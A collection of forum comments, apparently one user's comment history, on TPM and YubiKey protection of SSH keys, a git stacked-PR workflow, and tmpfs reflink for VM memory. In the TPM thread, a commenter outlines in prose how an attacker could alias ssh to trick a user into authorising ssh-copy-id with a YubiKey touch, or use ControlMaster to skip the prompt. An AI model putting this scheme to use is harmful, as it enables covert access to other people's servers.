That's fine but realize you are not representative of the average tech worker or indeed any white collar worker such as those we are talking about in this post.
TPMs can be useful to you as an individual if you're trying to protect against an evil maid attack. Although I think Linux isn't quite there yet with its support for it. The systemd folks are making progress though.
That only helps if you set a strong password as your TPM PIN. Otherwise its hardware-bound with no access control, and just as susceptible to evil maid attacks as storing the keys directly in a file.
I don't see how entering a passphrase into a compromised boot loader/kernel/initramfs is as safe as a measured boot with TPM providing the decryption key only if nothing seems to have been tampered with. Can you elaborate please?
I said this elsewhere in the thread, but to repeat here:
Can you explain why securing the ssh keys on a host that was fully compromised like that is anything but theater? Fine, you can't get the key out. You can just run the command directly.
Again, there are use cases where TPMs provide value to authenticate specific devices. But they are not and never have been about "keeping secrets". Your secrets are trash once the device is compromised.
Well I wasn't talking about ssh keys at all - that's where the misunderstanding comes from. I was simply trying to counter your claim that TPMs are never ever useful for individuals. They can be useful to individuals worried about having their boot tampered with.
I absolutely agree that they do zilch to protect your SSH keys. Hardware security keys that need physical confirmation of presence are much better for that use-case.
They can use the key as long as they can access your computer, but they shouldn't be able to get the secret key out of the TPM or Yubikey and use it elsewhere while your computer is off. That's the main point of HSMs.
I know the title says "in your TPM chip" but the method described does not store your private key in the TPM, it stores it in a PKCS keystore which is encrypted by a key in your TPM. In actual use the plaintext of your private ssh key still shows up in your ssh client for validation to the remote host.
The recommended usage of a yubikey for ssh does something similar as otherwise your key consumes one of the limited number of slots on the key.
Yes, with TPM and yubikey you have the option to store the per key material on disk, encrypted by the TPM. But the way this is then used is that the PKCS software sends that encrypted blob AND the requested operation, and gets only the output back. The CPU doesn't get the SSH private key back. Just the output of the RSA operation using the key.
I really don't think this is true for FIDO2 like Yubikey. My understanding is that your ssh client gets a challenge from the server, reads the key "handle" from the private key file, and sends both to Yubikey. The device then combines its master key with the handle to get the actual private key, signs the challenge, and gives the result back to your ssh client. At no point does the private key leave the Yubikey.
I don't know if you are missing anything. That's why I'm asking and making statements about how I understand the various processes to work. I want to understand how it is that the only device that interacts with the yubikey/tpm, when compromised, can't be subverted to the attackers ends.
Perhaps one extra bit to add: you've mentioned consuming slots on the device - that's what happens if you generate a resident key. Those keys live on the device and can be used from any computer you plug them into, without having to retain/copy any files. A non-resident key, on the other hand, is derived from the master key on the device, and a "handle" that's stored as a file on your computer. You can have as many as you want, but if you lose either the file or the hardware device, they're gone.
(Others in the thread have confirmed that both resident and non-resident keys never leave the hardware. If you generate one that requires touch, they're fairly secure - you need physical presence and confirmation for every operation.)
This article's method is bad, basically the same as systemd-creds (not itself bad, just extremely compatible), take a look at tpm-ssh-agent or gnupg for how to do that part the right way (the party they don't do right is bind/sign to pcrs, which is just low hanging fruit in today's day and age...)
Yeah but they already mentioned that they expect the attacker to hijack your ssh command so you'll touch it yourself, thinking you're authorizing something else than you actually are.
It does mean that they can't use the key a thousand times. But once? Yeah sure.
> hijack your ssh command so you'll touch it yourself, thinking you're authorizing something else than you actually are.
That doesn’t do anything at all.
1. If the attacker is redirecting you to a different host then ssh will simply refuse to connect due to known_hosts (I guess they could have added to that file too, redirect you to a honeypot and then hopefully you’ll run “sudo” before realizing but then at that point just hijack “sudo” itself in the local machine)
2. If the attacker is trying to let you connect and eavesdrop your connection to still credentials then that also still doesn’t work as the handshake for ssh is not vulnerable to replay attacks
The attacker could trick you into signing something I guess but then that still doesn’t do anything because secrets are not divulged at any point
I guess if the yubikey is also used for `sudo` then your attack makes more sense, as the attacker could prompt you to authenticate a sudo request when you call the evil `ssh`
Okay let me elaborate how I envision that attack to work:
1. attacker wants to use your yubikey-backed ssh key, let's say for running ssh-copy-id once with their own key so they can gain access to your server
2. thus they need to trick you into touching the key when they run that command
3. the best way to trick you is to wait until you do something where you'd normally need to touch that key yourself
4. so they alias ssh to a script that detects when you're trying to connect to this server yourself, and invoke ssh-copy-id instead, which prompts you to touch the yubikey and you do
5. spit out a reasonable looking error (something that makes you think "bloody DNS, it's always DNS, innit" or something silly like that); then they undo the alias so you succeed on the next try and suspect nothing
Indeed, that was my point exactly a couple posts up the thread. :-)
> you may realise that something wrong happened
I think I can iterate on the exact mechanics to make this less likely. I mean it's getting off-topic but the one thing that comes to mind is to enable ControlMaster for all ssh connections which allows any second ssh invocation to skip the auth and just re-use the existing connection. ssh-copy-id is near instant then and doesn't ask anything.
At that point you might—rightly so—argue that they're no longer tricking the user into authorising a different operation. Just a reminder that if someone can run code as your local user, they can easily and sneakily gain access elsewhere. Even if you need a yubikey touch to connect there.
The original attack idea of timing the yubikey touch for when you normally expect to touch it might still be relevant for a scenario like ssh-agent forwarding to a malicious box. They can't run code as your local user, but can still perhaps trigger the agent to interact with the yubikey. Maybe.
It's also a bit outdated. OpenSSH supports FIDO2 natively, so all this gnupg stuff is unnecessary for ssh. One can even use yubikey-backed ssh keys for commit signing.
And the best thing is that you can create several different ssh keys this way, each with a different password, if that's something you prefer. Then you need to type the password _and_ touch the yubikey.
This assumes that the server is running a recent enough OpenSSH. Configured with this enabled. For Linux servers, sure. For routers, less obviously so.
Yeah but more importantly neither will those multi million dollar routers your ISP uses. Nor their ten thousand thousand dollar switches.
And they won't be replacing these just because they're missing FIDO. And they can't "just" be upgraded because they aren't necessarily just Linux boxes in a trenchcoat. Nor are they necessarily running any version of OpenSSH.
These work flawlessly with the KeepassXC ssh-agent integration. My private keys are password protected, saved securely inside my password vault, and with my ssh config setup, I just type in the hostname and tap my Yubikey.
Many of those are "Merge branch 'master' into armanc/subtitle-sync-refactor". Rebasing the PR on top of master would bring that down to like 15 or something.
It's awesome that they're adding a UI for stacked branches¹! The UX of the CLI tool seems weird, though. Why do I need to explicitly create and add branches to the stack if all I really want is to open PRs from my commits? Here's the workflow that I built for myself instead:
∙ `git checkout -b feature-branch-xyz`
∙ make a few commits, perhaps some fixups, rebase, whatever
∙ start tig, look at the history, decide at which points I want to break the branch into stacked PRs, and mark those points using shift-s (which calls my own `git gh-stack branch create $commit` and creates a specially named branch there)
∙ `git gh-stack sync` — collects all the specially named branches, builds a graph of how they're stacked on one another, pushes them, opens stacked PRs
GitHub has had some "support" for stacked PRs for a while, so merging the first one to main will automatically change the target branch of the second to main.
If I need to change anything, I can just `git rebase --interactive --update-refs`, amend commits, split commits, rearrange commits, and then running `git gh-stack sync` will update the PRs for me. If I split a commit in the middle and shift-s to mark it, it will open an extra PR and restack everything to update the order.
Furthermore, the "PR stack" doesn't actually need to be a stack (linear chain), it can be a tree. If I know that some commits are independent of the rest, I don't need to create a separate stack, I just create another local branch, mark PR-ready commits with shift-s, and `git gh-stack sync` will do the right thing. If I need to rebase the whole tree on top of current main, then `git rebase -i --rebase-merges --update-refs` does the job.
I guess what I'm saying is that as someone who's been using git since its inception, it feels much more natural to just do everything in git, and then have a single command that pushes my work to GitHub. And I think this might work even better with jujutsu — just point `git gh-stack sync` at the branches jj makes and it'll make a stack/tree of PRs out of them. :-)
¹) I mean, I'd much rather they added a UI for reviewing PRs commit-by-commit, with the option to approve/request-changes on each, and the possibility to merge the first few approved ones while continuing work on the rest… But in a world of almost every $dayjob insisting on squash-merging, a UI for stacked PRs is a total game changer, positively.
They haven't fixed the fork issue, the FAQ clarifies this. I suspect the target audience is squash merging corpos. Everyone else can just do normal PRs with atomic commits reviewed individually...
Assuming you're currently on the most recent branch (furthest from the trunk), `git rebase -i --update-refs trunk` will rebase all the intermediate branches. If you need to make a change to the first branch nearest the trunk, either use `edit` in the interactive rebase, or make a fixup commit and enable autosquash for the rebase. The `--update-refs` flag makes sure that all the intermediate branches get updated during the rebase.
Then, to push them all, something like `git push origin 'refs/heads/yourname/*'` will push all branches prefixed with `yourname/`. It's a bit stupid that one can't just do `git push 'yourname/*'` though.
I tried to do something similar well over a decade ago during an internal hackathon (the motivation back then being speeding up destructive integration tests). My idea was to have the memory be a file on tmpfs, and simply `cp --reflink` to get a copy-on-write clone. Then you wouldn't need to bother with userfaultfd or slow storage as the kernel would just magically do the right thing.
Unfortunately, the Linux kernel didn't support reflink on tmpfs (and still doesn't), and I'm not genius enough to have been able to implement that within 24 hours. :-)
I still believe it'd be nice to implement reflink for tmpfs, though. It's the perfect interface for copy-on-write forking of VM memory.
(yes that's a real story from my career, and the company was 100+ employees at the time)
reply